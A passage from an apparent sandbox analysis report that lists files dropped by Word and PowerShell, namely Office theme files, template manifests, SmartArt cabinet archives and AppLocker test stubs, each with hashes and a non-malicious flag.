                                                                                                                                                        SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8EE9.tmp\Mesh.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3078052
                                                                                                                                                        Entropy (8bit):7.954129852655753
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                                        MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                                        SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                                        SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                                        SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8EE9.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):274
                                                                                                                                                        Entropy (8bit):3.5303110391598502
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                                                                                                                        SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                                                                                                                        SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                                                                                                                        SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8EFA.tmp\Main_Event.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2924237
                                                                                                                                                        Entropy (8bit):7.970803022812704
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                                        MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                                        SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                                        SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                                        SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8EFA.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):286
                                                                                                                                                        Entropy (8bit):3.5434534344080606
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                                                                                                                        SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                                                                                                                        SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                                                                                                                        SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD9297.tmp\Vapor_Trail.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3611324
                                                                                                                                                        Entropy (8bit):7.965784120725206
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                                        MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                                        SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                                        SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                                        SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD9297.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):288
                                                                                                                                                        Entropy (8bit):3.5359188337181853
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:0FEA64606C519B78B7A52639FEA11492
                                                                                                                                                        SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                                                                                                                        SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                                                                                                                        SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD92F6.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):274
                                                                                                                                                        Entropy (8bit):3.4699940532942914
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                                        MD5:55BA5B2974A072B131249FD9FD42EB91
                                                                                                                                                        SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                                                                                                                        SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                                                                                                                        SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD92F6.tmp\Insight design set.dotx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3465076
                                                                                                                                                        Entropy (8bit):7.898517227646252
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                                        MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                                        SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                                        SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                                        SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vuwbsdk.q03.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eohnalwy.nkl.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzycr0j5.ypo.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okiqt1tc.nko.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxpsfitv.fnn.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfzrfyic.wf1.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D3F.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):19893
                                                                                                                                                        Entropy (8bit):7.592090622603185
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                                                                                                                        MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                                                                                                                        SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                                                                                                                        SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                                                                                                                        SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D50.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):19288
                                                                                                                                                        Entropy (8bit):7.570850633867256
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                                                                                                                        MD5:B9A6FF715719EE9DE16421AB983CA745
                                                                                                                                                        SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                                                                                                                        SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                                                                                                                        SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cab7D51.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22594
                                                                                                                                                        Entropy (8bit):7.674816892242868
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                                                                                                                        MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                                                                                                                        SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                                                                                                                        SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                                                                                                                        SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                                                                                                                        Malicious:false
